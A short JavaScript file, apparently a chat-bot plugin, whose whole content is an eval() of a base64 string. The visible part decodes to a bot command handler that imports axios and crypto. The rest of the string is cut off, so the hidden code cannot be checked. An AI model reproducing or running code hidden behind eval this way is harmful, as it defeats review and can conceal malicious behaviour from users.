import { Buffer } from 'buffer';
eval(Buffer.from("Ci8vLS0tPiBDcmVhZG8gcG9yIEFkbyAmIE5PVVIg4pqhCmltcG9ydCBheGlvcyBmcm9tICdheGlvcyc7CmltcG9ydCBjcnlwdG8gZnJvbSAnY3J5cHRvJzsKCmxldCBoYW5kbGVyID0gYXN5bmMgKG0sIHsgY29ubiwgdGV4dCwgdXNlZFByZWZpeCwgY29tbWFuZCB9KSA9PiB7CiAgICBpZiAoIXRleHQpIHRocm93IGB...
...YXVsdCBoYW5kbGVyOwo=", "base64").toString("utf-8"));